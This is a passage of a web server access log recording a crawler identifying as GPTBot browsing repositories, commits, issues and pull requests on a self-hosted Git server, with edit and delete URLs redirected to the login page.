GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&state=all&type=all" [Client 74.7.227.38] [Length 9968] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:17:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&state=all&type=all" [Client 74.7.227.38] [Length 10147] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:17:14:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9921] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api" +[17/Feb/2026:17:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 9912] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake" +[17/Feb/2026:17:14:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9953] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:14:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11325] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:14:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14310] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:17:14:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9987] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:14:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:14:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9939] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:17:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10274] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&state=all&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:17:14:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 16142] [Gzip 10.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" +[17/Feb/2026:17:14:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" [Client 74.7.227.38] [Length 16109] [Gzip 10.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" +[17/Feb/2026:17:14:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages/DCS.html" +[17/Feb/2026:17:14:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json" +[17/Feb/2026:17:14:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/project.assets.json" +[17/Feb/2026:17:14:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9955] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:14:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 2092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:17:14:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 9965] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:17:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14584] [Gzip 9.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:17:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query" +[17/Feb/2026:17:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10247] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:17:14:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:14:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 11333] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal" +[17/Feb/2026:17:14:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json" +[17/Feb/2026:17:14:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/project.assets.json" +[17/Feb/2026:17:14:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11517] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" +[17/Feb/2026:17:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11366] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" +[17/Feb/2026:17:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" +[17/Feb/2026:17:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11984] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" +[17/Feb/2026:17:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz?display=rendered" [Client 74.7.227.38] [Length 11123] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:17:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9951] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:17:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10127] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:17:14:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9963] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:17:14:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9940] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:17:14:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json" +[17/Feb/2026:17:14:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/global.json" +[17/Feb/2026:17:14:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json" +[17/Feb/2026:17:14:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/global.json" +[17/Feb/2026:17:14:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 9811] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json" +[17/Feb/2026:17:14:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 10386] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json" +[17/Feb/2026:17:14:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json" +[17/Feb/2026:17:14:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 895] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json" +[17/Feb/2026:17:14:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10124] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:17:14:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9952] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:17:14:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10150] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&state=all&type=all" +[17/Feb/2026:17:14:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&state=all&type=all" +[17/Feb/2026:17:14:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&state=all&type=all" +[17/Feb/2026:17:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9965] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&state=all&type=all" +[17/Feb/2026:17:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&state=all&type=all" +[17/Feb/2026:17:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&state=all&type=all" +[17/Feb/2026:17:14:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/global.json" +[17/Feb/2026:17:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/global.json" +[17/Feb/2026:17:14:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/global.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/global.json" +[17/Feb/2026:17:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 